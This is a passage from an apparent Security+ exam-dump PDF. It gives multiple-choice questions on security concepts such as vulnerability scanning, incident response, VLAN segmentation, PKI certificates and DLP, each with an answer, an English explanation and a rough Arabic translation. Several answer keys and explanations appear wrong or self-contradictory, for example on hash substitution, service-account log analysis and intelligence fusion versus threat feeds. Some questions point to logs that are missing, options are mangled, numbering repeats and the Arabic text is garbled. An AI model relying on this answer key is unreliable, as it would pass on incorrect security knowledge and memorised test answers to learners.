‫هجوم متكرر بالقوة الغاشمة على حساب مسؤول واحد متبوعا بتسجيالت دخول مشبوهة من مواقع جغرافية غير مألوفة‬.
‫أي من مصادر البيانات التالية سيكون من األفضل استخدامها لتقييم الحسابات المتأثرة بهذا الهجوم؟‬
‫تحليالت سلوك المستخدم‬
‫ حيث يمكنها تحديد النشاط غير‬، ‫) أفضل مصدر للبيانات لتقييم الحسابات المتأثرة بالهجوم‬UBA( ‫ ستكون تحليلات سلوك المستخدم‬:‫تفسير‬
‫ وتقديم رؤى حول سلوك الحسابات‬، ‫ مثل هجمات القوة الغاشمة المتكررة وعمليات تسجيل الدخول من مواقع جغرافية غير مألوفة‬، ‫الطبيعي‬
.‫المتأثرة‬
23. A security analyst needs an overview of vulnerabilities for a host on the network.
Which of the following is the BEST type of scan for the analyst to run to discover which vulnerable
services are running?
A. Non-credentialed
B. Web application
C. Privileged
D. Internal
Answer: C
Explanation:
Privileged scanning, also known as credentialed scanning, is a type of vulnerability scanning that
uses avalid user account to log in to the target host and examine vulnerabilities from a trusted user’s
perspective. It can provide more accurate and comprehensive results than unprivileged scanning,
whichdoes not use any credentials and only scans for externally visible vulnerabilities.
‫ أي مما يلي هو أفضل نوع من الفحص للمحلل‬.‫يحتاج محلل الأمان إلى نظرة عامة على نقاط الضعف لمضيف على الشبكة‬
‫لتشغيله لاكتشاف الخدمات الضعيفة قيد التشغيل؟ غير معتمد تطبيق ويب ممتاز داخلي‬
‫ هو نوع من فحص الثغرات الأمنية يستخدم حساب مستخدم‬، ‫ المعروف أيضا باسم الفحص المعتمد‬، ‫ الفحص المميز‬:‫تفسير‬
‫ يمكن أن يوفر نتائج‬.‫صالح لتسجيل الدخول إلى المضيف المستهدف وفحص نقاط الضعف من منظور مستخدم موثوق به‬
.‫ والذي لا يستخدم أي بيانات اعتماد ويفحص فقط نقاط الضعف المرئية خارجيا‬، ‫أكثر دقة وشمولية من الفحص غير المميز‬
14 / 198
The safer , easier way to help you pass any IT exams.
24. An attacker replaces a digitally signed document with another version that goes unnoticed Upon
reviewing the document's contents the author notices some additional verbiage that was not originally in
the document but cannot validate an integrity issue.
Which of the following attacks was used?
A. Cryptomalware
B. Hash substitution
C. Collision
D. Phishing
Answer: B
Explanation:
This type of attack occurs when an attacker replaces a digitally signed document with another
versionthat has a different hash value. The author would be able to notice the additional verbiage,
however, since the hash value would have changed, they would not be able to validate an integrity
issue.
‫ يلاحظ المؤلف بعض الإسهاب الإضافي الذي لم‬، ‫يستبدل المهاجم مستندا موقعا رقميا بإصدار آخر لا يلاحظه أحد عند مراجعة محتويات المستند‬
‫ أي الهجمات الآتية استخدمت؟ البرمجيات الخبيثة‬.‫يكن موجودا في الأصل في المستند ولكن لا يمكنه التحقق من صحة مشكلة تتعلق بالسلامة‬
.‫المشفرة استبدال التجزئة صدام التصيد الاحتيالي‬
‫ سيكون المؤلف‬، ‫ ومع ذلك‬.‫ يحدث هذا النوع من الهجوم عندما يستبدل المهاجم مستندا موقعا رقميا بإصدار آخر له قيمة تجزئة مختلفة‬:‫تفسير‬
.‫ فلن يتمكن من التحقق من صحة مشكلة النزاهة‬، ‫ نظرا لأن قيمة التجزئة قد تغيرت‬، ‫قادرا على ملاحظة الإسهاب الإضافي‬
15 / 198
The safer , easier way to help you pass any IT exams.
25. The help desk has received calls from users in multiple locations who are unable to access
corenetwork services The network team has identified and turned off the network switches
using remote commands.
Which of the following actions should the network team take NEXT?
A. Disconnect all external network connections from the firewall
B. Send response teams to the network switch locations to perform updates
C. Turn on all the network switches by using the centralized management software
D. Initiate the organization's incident response plan.
Answer: D
‫تلقى مكتب المساعدة مكالمات من مستخدمين في مواقع متعددة غير قادرين على الوصول إلى خدمات الشبكة الأساسية قام فريق الشبكة‬
‫؟ افصل جميع‬NEXT ‫ أي من الإجراءات التالية يجب أن يتخذها فريق الشبكة‬.‫بتحديد وإيقاف تشغيل مفاتيح الشبكة باستخدام الأوامر عن بعد‬
‫اتصالات الشبكة الخارجية عن جدار الحماية إرسال فرق الاستجابة إلى مواقع تبديل الشبكة لإجراء التحديثات قم بتشغيل جميع مفاتيح الشبكة‬
.‫باستخدام برنامج الإدارة المركزية بدء خطة الاستجابة للحوادث الخاصة بالمنظمة‬
Explanation:
An incident response plan is a set of procedures and guidelines that defines how an organization
should respond to a security incident. An incident response plan typically includes the following
phases: preparation, identification, containment, eradication, recovery, and lessons learned.
If the help desk has received calls from users in multiple locations who are unable to access core
network services, it could indicate that a network outage or a denial-of-service attack has occurred. The
network team has identified and turned off the network switches using remote commands, which could
be a containment measure to isolate the affected devices and prevent further damage.
The next action that the network team should take is to initiate the organization’s incident response plan,
which would involve notifying the appropriate stakeholders, such as management, security team, legal
team, etc., and following the predefined steps to investigate, analyze, document, and resolve the
incident.
The other options are not correct because:
A. Disconnect all external network connections from the firewall. This could be another containment
measure to prevent external attackers from accessing the network, but it would also disrupt legitimate
network traffic and services. This action should be taken only if it is part of the incident response plan
and after notifying the relevant parties.
B. Send response teams to the network switch locations to perform updates. This could be a recovery
measure to restore normal network operations and apply patches or updates to prevent future incidents,
but it should be done only after the incident has been properly identified, contained, and eradicated.
C. Turn on all the network switches by using the centralized management software. This could be a
recovery measure to restore normal network operations, but it should be done only after the incident has
been properly identified, contained, and eradicated.
According to CompTIA Security+ SY0-601 Exam Objectives 1.5 Given a scenario, analyze indicators of
compromise and determine the type of malware:
“An incident response plan is a set of procedures and guidelines that defines how an organization should
respond to a security incident. An incident response plan typically includes the following phases:
preparation, identification, containment, eradication, recovery, and lessons learned.”
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
16 / 198
The safer , easier way to help you pass any IT exams.
26. When planning to build a virtual environment, an administrator need to achieve the following,
• Establish polices in Limit who can create new VMs
• Allocate resources according to actual utilization‘
• Require justication for requests outside of the standard requirements.
• Create standardized categories based on size and resource requirements
Which of the following is the administrator MOST likely trying to do?
A. Implement IaaS replication
B. Product against VM escape
C. Deploy a PaaS
D. Avoid VM sprawl
Answer: D
Explanation:
The administrator is most likely trying to avoid VM sprawl, which occurs when too many VMs are
createdand managed poorly, leading to resource waste and increased security risks. The listed actions
can helpestablish policies, resource allocation, and categorization to prevent unnecessary VM creation
and ensure proper management.
‫ من يمكنه إنشاء أجهزة‬Limit ‫ إنشاء سياسات في‬، ‫ يحتاج المسؤول إلى تحقيق ما يلي‬، ‫عند التخطيط لبناء بيئة افتراضية‬
‫ إنشاء فئات موحدة‬.‫ظاهرية جديدة تخصيص الموارد وفقا للاستخدام الفعلي ' طلب تبرير للطلبات خارج المتطلبات القياسية‬
‫استنادا إلى الحجم ومتطلبات الموارد أي مما يلي يحاول المسؤول على الأرجح القيام به؟‬
VM ‫ تجنب امتداد‬PaaS ‫ نشر‬VM ‫ المنتج ضد هروب‬IaaS ‫تنفيذ النسخ المتماثل ل‬
‫ والذي يحدث عندما يتم إنشاء عدد كبير جدا من الأجهزة‬،‫ يحاول المسؤول على الأرجح تجنب امتداد الجهاز الظاهري‬:‫تفسير‬
‫ يمكن أن تساعد الإجراءات المدرجة في‬.‫ مما يؤدي إلى إهدار الموارد وزيادة مخاطر الأمان‬،‫الظاهرية وإدارتها بشكل سيئ‬
.‫إنشاء السياسات وتخصيص الموارد والتصنيف لمنع إنشاء الأجهزة الظاهرية غير الضرورية وضمان الإدارة المناسبة‬
17 / 198
The safer , easier way to help you pass any IT exams.
27.A company Is planning to install a guest wireless network so visitors will be able to access the
Internet. The stakeholders want the network to be easy to connect to so time is not wasted during
meetings. The WAPs are configured so that power levels and antennas cover only the conference rooms
where visitors will attend meetings.
Which of the following would BEST protect the company's Internal wireless network against
visitorsaccessing company resources?
A. Configure the guest wireless network to be on a separate VLAN from the company's internal
wireless network
B. Change the password for the guest wireless network every month.
C. Decrease the power levels of the access points for the guest wireless network.
D. Enable WPA2 using 802.1X for logging on to the guest wireless network.
Answer: A
Explanation:
Configuring the guest wireless network on a separate VLAN from the company's internal
wirelessnetwork will prevent visitors from accessing company resources.
‫ يريد أصحاب المصلحة أن تكون‬.‫تخطط شركة لتركيب شبكة لاسلكية للضيوف حتى يتمكن الزوار من الوصول إلى الإنترنت‬.27
‫ بحيث تغطي مستويات الطاقة والهوائيات‬WAPs ‫ يتم تكوين‬.‫الشبكة سهلة الاتصال بها حتى لا يضيع الوقت أثناء الاجتماعات‬
‫ أي مما يلي من شأنه أن يحمي الشبكة اللاسلكية الداخلية للشركة‬.‫فقط غرف المؤتمرات التي سيحضر فيها الزوار الاجتماعات‬
‫بشكل أفضل من وصول الزوار إلى موارد الشركة؟ قم بتكوين الشبكة اللاسلكية الضيف لتكون على شبكة محلية ظاهرية‬
‫ قم بتقليل مستويات‬.‫منفصلة عن الشبكة اللاسلكية الداخلية للشركة قم بتغيير كلمة المرور لشبكة الضيف اللاسلكية كل شهر‬
‫ لتسجيل الدخول إلى الشبكة اللاسلكية‬X802.1 ‫ باستخدام‬WPA2 ‫ قم بتمكين‬.‫طاقة نقاط الوصول لشبكة الضيف اللاسلكية‬
.‫الضيف‬
‫ سيؤدي تكوين الشبكة اللاسلكية الضيف على شبكة محلية ظاهرية منفصلة عن الشبكة اللاسلكية الداخلية للشركة‬:‫تفسير‬
.‫إلى منع الزوار من الوصول إلى موارد الشركة‬
18 / 198
The safer , easier way to help you pass any IT exams.
28. An analyst is working on an email security incident in which the target opened an
attachment containing a worm. The analyst wants to implement mitigation techniques to
prevent further spread.Which of the following is the BEST course of action for the analyst to
take?
A. Apply a DLP solution.
B. Implement network segmentation
C. Utilize email content filtering,
D. isolate the infected attachment.
Answer: B
Explanation:
Network segmentation is the BEST course of action for the analyst to take to prevent further
spread of the worm. Network segmentation helps to divide a network into smaller segments, isolating
the infected attachment from the rest of the network. This helps to prevent the worm from spreading to
other deviceswithin the network. Implementing email content filtering or DLP solution might help in
preventing the email from reaching the target or identifying the worm, respectively, but will not stop the
spread of the worm.
‫ يريد المحلل تنفيذ تقنيات‬.‫يعمل محلل على حادث أمان بريد إلكتروني يفتح فيه الهدف مرفقا يحتوي على فيروس متنقل‬
‫ أي مما يلي هو أفضل مسار عمل يتخذه المحلل؟ تنفيذ تجزئة الشبكة‬.‫التخفيف لمنع المزيد من الانتشار‬
29.A security engineer needs to create a network segment that can be used for servers thal require
connections from untrusted networks.
Which of the following should the engineer implement?
A. An air gap
B. A hot site
C. A VUAN
D. A screened subnet
Answer: D
Explanation:
A screened subnet is a network segment that can be used for servers that require connections from
untrusted networks. It is placed between two firewalls, with one firewall facing the untrusted network and
the other facing the trusted network. This setup provides an additional layer of security by screening the
traffic that flows between the two networks.
‫ أي‬.‫يحتاج مهندس الأمن إلى إنشاء مقطع شبكة يمكن استخدامه للخوادم التي تتطلب اتصالات من شبكات غير موثوق بها‬.29
‫مما يلي يجب على المهندس تنفيذه؟‬
‫ شبكة فرعية تم فحصها‬, ‫ وفوان‬, ‫ موقع ساخن‬, ‫فجوة هوائية‬
‫ الشبكة الفرعية التي تم فحصها هي جزء شبكة يمكن استخدامه للخوادم التي تتطلب اتصالات من شبكات غير موثوق‬:‫تفسير‬
‫ مع جدار حماية واحد يواجه الشبكة غير الموثوق بها والآخر يواجه الشبكة‬، ‫ يتم وضعه بين اثنين من جدران الحماية‬.‫بها‬
.‫ يوفر هذا الإعداد طبقة إضافية من الأمان عن طريق فحص حركة المرور التي تتدفق بين الشبكتين‬.‫الموثوقة‬
19 / 198
The safer , easier way to help you pass any IT exams.
30.A company was compromised, and a security analyst discovered the attacker was able to get access
to a service account.
The following logs were discovered during the investigation:
Which of the following MOST likely would have prevented the attacker from learning the service account
name?
A. Race condition testing
B. Proper error handling
C. Forward web server logs to a SIEM
D. Inputsanitizatio
Answer: D
Explanation:
Input sanitization can help prevent attackers from learning the service account name by removing
potentially harmful characters from user input, reducing the likelihood of successful injection attacks.
:‫ تم اكتشاف السجلات التالية أثناء التحقيق‬.‫ واكتشف محلل أمني أن المهاجم كان قادرا على الوصول إلى حساب الخدمة‬، ‫تم اختراق الشركة‬
‫أي مما يلي كان سيمنع المهاجم على الأرجح من معرفة اسم حساب الخدمة؟‬
‫ تعقيم المدخلات‬, SIEM ‫اختبار حالة السباق معالجة الأخطاء المناسبة إعادة توجيه سجلات خادم الويب إلى‬
‫ يمكن أن يساعد تعقيم المدخلات في منع المهاجمين من معرفة اسم حساب الخدمة عن طريق إزالة الأحرف التي يحتمل أن تكون ضارة‬:‫التفسير‬
.‫ مما يقلل من احتمالية نجاح هجمات الحقن‬،‫من إدخال المستخدم‬
31.A security researcher is tracking an adversary by noting its attacks and techniques based on
itscapabilities, infrastructure, and victims.
Which of the following is the researcher MOST likely using?
A. The Diamond Model of Intrusion Analysis
B. The Cyber Kill Chain
C. The MITRE CVE database
D. The incident response process
Answer: A
Explanation:
The Diamond Model is a framework for analyzing cyber threats that focuses on four key elements:
adversary, capability, infrastructure, and victim. By analyzing these elements, security researchers can
gain a better understanding of the threat landscape and develop more effective security strategies.
‫ أي مما يلي‬.‫يقوم باحث أمني بتعقب الخصم من خلال ملاحظة هجماته وتقنياته بناء على قدراته وبنيته التحتية وضحاياه‬-31
‫يستخدمه الباحث على الأرجح؟ نموذج الماس لتحليل التسلل سلسلة القتل السيبراني قاعدة بيانات مكافحة التطرف العنيف‬
.‫ عملية الاستجابة للحوادث‬, MITRE
‫ الخصم والقدرة والبنية‬:‫ النموذج الماسي هو إطار عمل لتحليل التهديدات السيبرانية يركز على أربعة عناصر رئيسية‬:‫تفسير‬
‫ يمكن للباحثين الأمنيين اكتساب فهم أفضل لمشهد التهديدات وتطوير‬، ‫ من خلال تحليل هذه العناصر‬.‫التحتية والضحية‬
.‫استراتيجيات أمنية أكثر فعالية‬
20 / 198
The safer , easier way to help you pass any IT exams.
32. Which of the following BEST describes data streams that are compiled through artificial
intelligence that provides insight on current cyber intrusions, phishing, and other malicious
cyberactivity?
A. Intelligence fusion
B. Review reports
C. Log reviews
D. Threat feeds
Answer: A
Explanation:
Intelligence fusion is a process that involves aggregating and analyzing data from multiple sources,
including artificial intelligence, to provide insight on current cyberintrusions, phishing, and other malicious
cyberactivity.
‫أي مما يلي يصف تدفقات البيانات التي يتم تجميعها من خلال الذكاء الاصطناعي الذي يوفر نظرة ثاقبة حول عمليات الاقتحام‬
‫الإلكتروني الحالية والتصيد الاحتيالي والنشاط السيبراني الضار الآخر؟‬
‫ تغذية التهديد‬.‫اندماج الذكاء مراجعة التقارير سجل المراجعات د‬
‫ لتوفير‬، ‫ بما في ذلك الذكاء الاصطناعي‬، ‫ دمج الذكاء هو عملية تتضمن تجميع وتحليل البيانات من مصادر متعددة‬:‫تفسير‬
.‫نظرة ثاقبة حول عمليات الاقتحام السيبراني الحالية والتصيد الاحتيالي والنشاط السيبراني الضار الآخر‬
32. As part of a company's ongoing SOC maturation process, the company wants to implement a method
to share cyber threat intelligence data with outside security partners.
Which of the following will the company MOST likely implement?
A. TAXII
B. TLP
C. TTP
D. STIX
Answer: A
Explanation:
Trusted Automated Exchange of Intelligence Information (TAXII) is a standard protocol that enables
the sharing of cyber threat intelligence between organizations. It allows organizations to automate the
exchange of information in a secure and timely manner.
‫ تريد الشركة تنفيذ طريقة لمشاركة بيانات استخبارات التهديدات الإلكترونية‬، ‫كجزء من عملية نضج المستمرة للشركة‬
‫ أي مما يلي ستنفذه الشركة على الأرجح؟ تاكسي إ‬.‫مع شركاء أمنيين خارجيين‬
‫ التبادل الآلي الموثوق للمعلومات الاستخباراتية هو بروتوكول قياسي يتيح مشاركة معلومات التهديدات‬:‫تفسير‬
‫ يسمح للمؤسسات بأتمتة تبادل المعلومات بطريقة آمنة وفي الوقت المناسب‬.‫الإلكترونية بين المؤسسات‬
21 / 198
The safer , easier way to help you pass any IT exams.
33. An information security manager for an organization is completing a PCI DSS self-assessment
for the first time. which of the is following MOST likely reason for this type of assessment?
A. An international expansion project is currently underway.
B. Outside consultants utilize this tool to measure security maturity.
C. The organization is expecting to process credit card information.
D. A government regulator has requested this audit to be completed
Answer: C
Explanation:
PCI DSS (Payment Card Industry Data Security Standard) is a set of security standards designed to
ensure that all companies that accept, process, store, or transmit credit card information maintain a
secure environment. Any organization that accepts credit card payments is required to comply with PCI
DSS.
‫ أي من الأسباب التالية على الأرجح لهذا النوع من‬.‫يقوم مدير أمن المعلومات لمؤسسة ما بإكمال التقييم الذاتي لأول مرة‬
‫التقييم؟ تتوقع المنظمة معالجة معلومات بطاقة الائتمان‬
‫ (معيار أمان بيانات صناعة بطاقات الدفع) هو مجموعة من معايير الأمان المصممة لضمان أن جميع الشركات التي‬:‫تفسير‬
‫ يتعين على أي مؤسسة تقبل مدفوعات‬.‫تقبل أو تعالج أو تخزن أو تنقل معلومات بطاقة الائتمان تحافظ على بيئة آمنة‬
. ‫بطاقات الائتمان الامتثال‬
34. Which of the following should a technician consider when selecting an encryption method
for datathat needs to remain confidential for a specific length of time?
A. The key length of the encryption algorithm
B. The encryption algorithm's longevity
C. A method of introducing entropy into key calculations
D. The computational overhead of calculating the encryption key
Answer: B
Explanation:
When selecting an encryption method for data that needs to remain confidential for a specific length of
time, the longevity of the encryption algorithm should be considered to ensure that the data
remainssecure for the required period.
‫أي مما يلي يجب على الفني مراعاته عند اختيار طريقة تشفير للبيانات التي يجب أن تظل سرية لفترة زمنية محددة؟‬
‫طول عمر خوارزمية التشفير‬
‫ يجب مراعاة طول عمر خوارزمية‬، ‫ عند اختيار طريقة تشفير للبيانات التي يجب أن تظل سرية لمدة محددة الوقت‬:‫تفسير‬
.‫التشفير لضمان بقاء البيانات آمنة للفترة المطلوبة‬
22 / 198
The safer , easier way to help you pass any IT exams.
36.A customer has reported that an organization's website displayed an image of a smiley (ace rather
than the expected web page for a short time two days earlier.
A security analyst reviews log tries and sees the following around the lime of the incident:
Which of the following is MOST likely occurring?
A. Invalid trust chain
B. Domain hijacking
C. DNS poisoning
D. URL redirection
Answer: C
Explanation:
The log entry shows the IP address for "www.example.com" being changed to a different IP address,
which is likely the result of DNS poisoning.
DNS poisoning occurs when an attacker is able to change the IP address associated with a
domain name in a DNS server's cache, causing clients to connect to the attacker's server instead of
the legitimate server.
‫ أبلغ أحد العملاء أن موقع الويب الخاص بإحدى المؤسسات عرض صورة مبتسم (الآس بدلا من صفحة الويب المتوقعة‬-36
‫ أي مما يلي يحدث على‬:‫ يقوم محلل أمني بمراجعة محاولات السجل ويرى ما يلي حول الجير للحادث‬.‫لفترة قصيرة قبل يومين‬
) ‫الأرجح؟ تسمم ( الدي ان اس‬
‫ يحدث‬.‫ والذي من المحتمل أن يكون نتيجة لتسمم‬، ‫تفسير \ يعرض إدخال السجل عنوان الذي يتم تغييره إلى عنوان مختلف‬
‫ مما يتسبب في اتصال‬، ‫تسمم عندما يتمكن المهاجم من تغيير عنوان المقترن باسم مجال في ذاكرة التخزين المؤقت لخادم‬
.‫العملاء بخادم المهاجم بدلا من الخادم الشرعي‬
23 / 198
The safer , easier way to help you pass any IT exams.
37. Which of the following disaster recovery tests is the LEAST time consuming for the
disasterrecovery team?
A. Tabletop
B. Parallel
C. Full interruption
D. Simulation
Answer: A
Explanation:
A tabletop exercise is a type of disaster recovery test that simulates a disaster scenario in a
discussion- based format, without actually disrupting operations or requiring physical testing of
recovery procedures.It is the least time-consuming type of test for the disaster recovery team.
,, ‫أي من اختبارات التعافي من الكوارث التالية هو الأقل استهلاكا للوقت لفريق التعافي من الكوارث؟ الطاوله‬
‫ دون‬، ‫ تمرين الطاولة هو نوع من اختبار التعافي من الكوارث الذي يحاكي سيناريو كارثة بتنسيق قائم على المناقشة‬:‫شرح‬
‫ إنه نوع الاختبار الأقل استهلاكا للوقت لفريق التعافي من‬.‫تعطيل العمليات فعليا أو طلب اختبار مادي لإجراءات الاسترداد‬
‫الكوارث‬
38.A security engineer is installing a WAF to protect the company's website from malicious web requests
over SSL.
Which of the following is needed to meet the objective?
A. A reverse proxy
B. A decryption certificate
C. A spill-tunnel VPN
D. Load-balanced servers
Answer: B
Explanation:
A Web Application Firewall (WAF) is a security solution that protects web applications from various types
of attacks such as SQL injection, cross-site scripting (XSS), and others. It is typically deployed in front of
web servers to inspect incoming traffic and filter out malicious requests.
To protect the company’s website from malicious web requests over SSL, a decryption certificate is
needed to decrypt the SSL traffic before it reaches the WAF. This allows the WAF to inspect the traffic
and filter out malicious requests.
‫ أي مما يلي مطلوب لتحقيق‬.‫يقوم مهندس أمن بتثبيت لحماية موقع الشركة على الويب من طلبات الويب الضارة عبر‬
‫الهدف؟ شهادة فك التشفير‬
SQL ‫) هو حل أمني يحمي تطبيقات الويب من أنواع مختلفة من الهجمات مثل حقن‬WAF( ‫ جدار حماية تطبيق الويب‬:‫تفسير‬
‫ يتم نشره عادة أمام خوادم الويب لفحص حركة المرور الواردة وتصفية الطلبات‬.‫) وغيرها‬XSS( ‫والبرمجة النصية عبر المواقع‬
‫ يلزم وجود شهادة فك تشفير لفك تشفير حركة‬، SSL ‫ لحماية موقع الشركة على الويب من طلبات الويب الضارة عبر‬.‫الضارة‬
.‫ بفحص حركة المرور وتصفية الطلبات الضارة‬WAF ‫ هذا يسمح ل‬.WAF ‫ قبل أن تصل إلى‬SSL ‫مرور‬
24 / 198
The safer , easier way to help you pass any IT exams.
39.A systems analyst determines the source of a high number of connections to a web server that were
initiated by ten different IP addresses that belong to a network block in a specific country.
Which of the following techniques will the systems analyst MOST likely implement to address this issue?
A. Content filter
B. SIEM
C. Firewall rules
D. DLP
Answer: C
Explanation:
A firewall is a network security system that monitors and controls incoming and outgoing network traffic
based on predetermined security rules. The systems analyst can use firewall rules to block connections
from the ten IP addresses in question, or from the entire network block in the specific country. This would
be a quick and effective way to address the issue of high connections to the web server initiated by these
IP addresses.
‫يحدد محلل النظم مصدر عدد كبير من الاتصالات بخادم ويب بدأتها عشرة عناوين مختلفة تنتمي إلى كتلة شبكة في‬.
‫ أي من التقنيات التالية سينفذها محلل الأنظمة على الأرجح لمعالجة هذه المشكلة؟ قواعد جدار الحماية‬.‫بلد معين‬
‫ جدار الحماية هو نظام أمان شبكة يراقب حركة مرور الشبكة الواردة والصادرة ويتحكم فيها بناء على قواعد أمان‬: ‫شرح‬
‫ أو من‬، ‫ يمكن لمحلل الأنظمة استخدام قواعد جدار الحماية لحظر الاتصالات من عناوين العشرة المعنية‬.‫محددة مسبقا‬
‫ ستكون هذه طريقة سريعة وفعالة لمعالجة مشكلة الاتصالات العالية بخادم‬.‫كتلة الشبكة بأكملها في البلد المحدد‬
.‫الويب التي بدأتها عناوين هذه‬
40.A company installed several crosscut shredders as part of increased information security
practicestargeting data leakage risks.
Which of the following will this practice reduce?
A. Dumpster diving
B. Shoulder surfing
C. Information elicitation
D. Credential harvesting
Answer: A
Explanation:
Crosscut shredders are used to destroy paper documents and reduce the risk of data leakage
through dumpster diving. Dumpster diving is a method of retrieving sensitive information from paper
waste by searching through discarded documents.
‫قامت إحدى الشركات بتركيب عدة آلات تمزيق متقاطعة كجزء من ممارسات أمن المعلومات المتزايدة التي‬-40
‫ أي مما يلي ستخففله هذه الممارسة؟ الغوص في القمامة‬.‫تستهدف مخاطر تسرب البيانات‬
‫ تستخدم آلات تمزيق الورق المتقاطعة لتدمير المستندات الورقية وتقليل مخاطر تسرب البيانات من خلال‬:‫تفسير‬
‫ الغوص في القمامة هو طريقة لاسترداد المعلومات الحساسة من النفايات الورقية عن طريق‬.‫الغوص في القمامة‬
.‫البحث في المستندات المهملة‬
25 / 198
The safer , easier way to help you pass any IT exams.
41. The Chief Executive Officer announced a new partnership with a strategic vendor and asked
theChief Information Security Officer to federate user digital identities using SAML-based
protocols.
Which of the following will this enable?
A. SSO
B. MFA
C. PKI
D. OLP
Answer: A
Explanation:
Federating user digital identities using SAML-based protocols enables Single Sign-On (SSO),
which allows users to log in once and access multiple applications without having to enter their
credentials for each one.
‫أعلن الرئيس التنفيذي عن شراكة جديدة مع بائع استراتيجي وطلب من كبير مسؤولي أمن المعلومات توحيد الهويات الرقمية للمستخدم باستخدام‬
‫ أي مما يلي سيمكنه هذا؟ اس او او تسجيل الدخول الأحادي‬.‫البروتوكولات القائمة على‬
‫ والذي يسمح للمستخدمين بتسجيل‬، ‫ يتيح توحيد الهويات الرقمية للمستخدم باستخدام البروتوكولات المستندة إلى تسجيل الدخول الأحادي‬:‫شرح‬
.‫الدخول مرة واحدة والوصول إلى تطبيقات متعددة دون الحاجة إلى إدخال بيانات الاعتماد الخاصة بهم لكل منها‬
42. An organization's Chief Information Security Officer is creating a position that will be responsible
for implementing technical controls to protect data, including ensuring backups are properly
maintained.
Which of the following roles would MOST likely include these responsibilities?
A. Data protection officer
B. Data owner
C. Backup administrator
D. Data Custodian
E. Internal auditor
Answer: D
Explanation:
The responsibilities of ensuring backups are properly maintained and implementing technical controls to
protect data are the responsibilities of the Data Custodian role.
‫ بما في ذلك‬، ‫يقوم كبير مسؤولي أمن المعلومات في المؤسسة بإنشاء منصب يكون مسؤولا عن تنفيذ الضوابط الفنية لحماية البيانات‬
‫ المدقق الداخلي‬:‫ أي من الأدوار التالية سيشمل على الأرجح هذه المسؤوليات؟ إجابة‬.‫ضمان الحفاظ على النسخ الاحتياطية بشكل صحيح‬
‫ مسؤوليات ضمان الحفاظ على النسخ الاحتياطية بشكل صحيح وتنفيذ الضوابط الفنية لحماية البيانات هي مسؤوليات دور أمين‬:‫التفسير‬
.‫البيانات‬
26 / 198
The safer , easier way to help you pass any IT exams.
43. As part of the building process for a web application, the compliance team requires that all
PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain
level.Which of the following certificate properties will meet these requirements?
A. HTTPS://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
B. HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022
C. HTTPS:// app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022
D. HTTPS://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00
Answer: A
Explanation:
PKI certificates are digital certificates that use public key infrastructure (PKI) to verify the identity and authenticity of a
sender and a receiver of data1. PKI certificates can be used to secure web applicationswith HTTPS, which is a protocol
that encrypts and protects the data transmitted over the internet1.
One of the properties of PKI certificates is the domain name, which is the name of thewebsite or web application that the
certificate is issued for2. The domain name can be either a specific name, such as app1.comptia.org, or a wildcard name,
such as *.comptia.org2. A wildcard name means that the certificate can be used with multiple subdomains of a domain,
such as payment.comptia.org or contact.comptia.org2. Another property of PKI certificates is the validity period, which is
the time span during which the certificate is valid and can be used3. The validity period is determined by the certificate
authority (CA) that issues the certificate, and it usually ranges from one to three years3. The validity period can be
checked by looking at the valid from and valid to dates on the certificate3.
Based on these properties, the certificate that will meet the requirements of rotating annually and only containing
wildcards at the secondary subdomain level is A. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8
12:00:00 2022. This certificate has a wildcard character (*) at the secondary subdomain level, which means it can be
used with any subdomain of comptia.org2. It also has a validity period of one year, which means it needs to be rotated
annually3.
‫ سنويا ويمكن أن تحتوي فقط على أحرف بدل على مستوى‬PKI ‫ يتطلب فريق الامتثال تدوير جميع شهادات‬،‫كجزء من عملية إنشاء تطبيق ويب‬
‫ أي من خصائص الشهادة التالية ستفي بهذه المتطلبات؟‬.‫النطاق الفرعي الثانوي‬
44.A company would like to provide flexibility for employees on device preference. However, the
company is concerned about supporting too many different types of hardware.
Which of the following deployment models will provide the needed flexibility with the GREATEST amountof control and
security over company data and infrastructure?
A. BYOD
B. VDI
C. COPE
D. CYOD
Answer: D
Explanation:
Choose Your Own Device (CYOD) is a deployment model that allows employees to select from a predefined list of
devices. It provides employees with flexibility in device preference while allowing the company to maintain control and
security over company data and infrastructure. CYOD deployment model provides a compromise between the strict
control provided by Corporate-Owned, Personally Enabled (COPE) deployment model and the flexibility provided by
Bring Your Own Device (BYOD) deployment model.
‫ فإن تهتم الشركة بدعم العديد من أنواع‬، ‫ ومع ذلك‬.‫ترغب إحدى الشركات في توفير المرونة للموظفين فيما يتعلق بتفضيل الجهاز‬.44
‫ أي من نماذج النشر التالية سيوفر المرونة اللازمة مع أكبر قدر من التحكم والأمان على بيانات الشركة والبنية التحتية؟‬.‫الأجهزة المختلفة‬
‫ يوفر للموظفين المرونة في تفضيل‬.‫) هو نموذج نشر يسمح للموظفين بالاختيار من قائمة محددة مسبقا من الأجهزة‬CYOD( ‫اختر جهازك الخاص‬
‫ حلا وسطا بين التحكم الصارم‬CYOD ‫ يوفر نموذج نشر‬.‫الجهاز مع السماح للشركة بالحفاظ على التحكم والأمان على بيانات الشركة والبنية التحتية‬
.)BYOD( ‫) والمرونة التي يوفرها نموذج نشر إحضار جهازك الخاص‬COPE( ‫الذي يوفره نموذج النشر المملوك للشركة والممكن شخصيا‬
27 / 198
The safer , easier way to help you pass any IT exams.
45. Which of the following must be in place before implementing a BCP?
A. SLA
B. AUP
C. NDA
D. BIA
Answer: D
Explanation:
A Business Impact Analysis (BIA) is a critical component of a Business Continuity Plan (BCP). It
identifies and prioritizes critical business functions and determines the impact of their disruption.
‫؟ بيا‬BCP ‫أي مما يلي يجب أن يكون في مكانه قبل تنفيذ‬
.‫ يحدد وظائف الأعمال الحيوية ويحدد أولوياتها ويحدد تأثير اضطرابها‬.)BCP( ‫) مكونا مهما في خطة استمرارية الأعمال‬BIA( ‫يعد تحليل تأثير الأعمال‬
46.A Chief Information Officer is concerned about employees using company-issued laptops to steal
datawhen accessing network shares. , Which of the following should the company implement?
A. DLP
B. CASB
C. HIDS
D. EDR
E. UEFI
Answer: A
Explanation:
The company should implement Data Loss Prevention (DLP) to prevent employees from stealing data.
